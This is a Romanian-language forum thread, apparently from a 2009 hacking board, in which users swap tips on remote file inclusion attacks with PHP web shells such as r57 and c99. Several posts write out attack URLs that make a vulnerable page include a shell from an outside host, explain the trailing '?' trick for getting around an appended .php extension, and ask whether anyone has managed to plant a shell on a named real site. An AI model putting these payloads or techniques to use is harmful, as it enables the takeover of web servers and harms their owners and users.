paxnWo Posted February 2, 2009 Report Posted February 2, 2009 1. frumos pentru incepatori. 2. de ce ai postat la sectiunea asta ? Quote
SirGod Posted February 2, 2009 Report Posted February 2, 2009 1) Nu sunt numai 2 shelluri,r57 si c99.Exista c100,TDShell,etc..2) Poti folosi si shell-uri in format .txt pentru a le include www.site.com/pagina.php?modul=http://www.gigi.com/c99.txt? . Quote
Nytro Posted February 2, 2009 Report Posted February 2, 2009 Shellurile trebuie sa fie in format TXT, nu in PHP. PHP pot fi decat pe un server fara PHP, care sa nu le interpreteze. Daca sunt in format PHP, vor fi interpretate pe serverul pe care se afla, iar in pagina ta vulnerabila va aparea rezultatul parsarii shellului pe acel server. Si nu ai explicat ce e cu acel "?". E folosit pentru a transforma acel ".php" in variabila prin GET ( asta face practic ), deci va include http://.../shell.txt?.php, iar acel .php nu mai incurca. Daca pagina vulnerabila apare asa: include $_GET['page'] fara .php, atunci nu mai e necesar. Quote
carnat Posted February 2, 2009 Report Posted February 2, 2009 =) da bini a reusit careva sa bage shellu pe http://ro.netlog.com/go/out/url= ? Quote
Nytro Posted February 2, 2009 Report Posted February 2, 2009 Sunt foarte putine pagini vulnerabile. Quote
crs12decoder Posted February 2, 2009 Report Posted February 2, 2009 1) Nu sunt numai 2 shelluri,r57 si c99.Exista c100,TDShell,etc..edit: uitati aici mai multe sortimente de shell-uri...http://www.r57shell.us/cum era sa le enumar pe toate .. am enumerat 2 care mi s-au parut mai importante--------------------Sunt foarte putine pagini vulnerabile.da... cel putin acu nu se mai lucreaza cu module pe baza de variabile date de userdar totusi sunt site-uri...... Quote
Guest Praetorian Posted February 2, 2009 Report Posted February 2, 2009 =) da bini a reusit careva sa bage shellu pe http://ro.netlog.com/go/out/url= ?Site-ul asta nu e vuln la rfi.. ci este doar un simplu iframe..http://ro.netlog.com/go/out/url=http://www.xfocus.net/tools/200608/r57.txt? Quote